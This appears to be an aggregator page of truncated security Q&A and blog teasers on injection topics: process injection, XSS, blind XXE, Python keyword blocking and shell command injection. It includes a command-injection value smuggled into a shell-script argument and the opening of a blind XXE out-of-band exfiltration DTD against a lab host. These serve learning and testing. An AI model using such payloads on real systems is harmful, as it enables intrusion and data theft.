Collaborate Disseminate
If the OS is responsible for ensuring that one process cannot access another process memory space, and the point of process isolation is to keep processes separate from one another, then how can a malicious process perform actions on anoth… Continue reading Process Injection and Process Isolation by OS
For a test to find vulnerabilities I found the following code in a page and I am looking for ways to manipulate it:
<script>
func({
"key1": "value",
"object": {
"key2": &… Continue reading Injection inside double quoted section of script element
I wondering if XSS is still possible with modern version of angular I that the older version have some sandbox bypass but what of the newer versions.
Continue reading is XSS possible on modern versions of angular
Until now most websites I know either check licenses via:
individual employee accounts (login needed)
an internally hosted website that is already licensed company-wide (without login)
However, in recent years I came across multiple webs… Continue reading Why is this kind of company wide license not a security risk? [closed]
It would be nice if sites like Medium or Substack allowed users to not only add text, images, code snippets, etc., but also custom scripts that allowed readers to run a little piece of code. For example, if someone was writing an article o… Continue reading Allowing users to add arbitrary JavaScript in published articles
I published the following diary on isc.sans.edu: “Defenders, Know Your Operating System Like Attackers Do!“: Not a technical diary today but more a reflection… When I’m teaching FOR610, I always remind students to “RTFM” or “Read the F… Manual”. I mean to not hesitate to have a look at the
The post [SANS ISC] Defenders, Know Your Operating System Like Attackers Do! appeared first on /dev/random.
Continue reading [SANS ISC] Defenders, Know Your Operating System Like Attackers Do!
Hardware fault injection uses electrical manipulation of a digital circuit to intentionally introduce errors, which can be used to cause processors to behave in unpredictable ways. This unintentional behavior can …read more Continue reading Injecting Bugs with an Electric Flyswatter
We recently had issues with people messing around inside our system. To prevent code injections within my python code, I implemented the following if block:
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Your interac… Continue reading Does blocking keywords prevent code injection inside this interactive Python file?
My lab
Kali Linux:192.168.171.134
bWApp Server: http://192.168.171.131
I want to do an exfiltration data via HTTP on this Blind XXE.
I’ll use the Portswigger Payload.
This is the External.DTD:
<!ENTITY % eval "<!ENTITY &a… Continue reading Blind XXE – Exfiltration Data via OOB
I am trying to find if the following shell script is vulnerable to command injection
#!/bin/sh
set -x
dig +noall +answer TXT $2._domainkey.$1
Now when I try something like this,
sh script.sh "sparkpost.com & echo \$(whoami)"… Continue reading Are positional parameters vulnerable to command injection?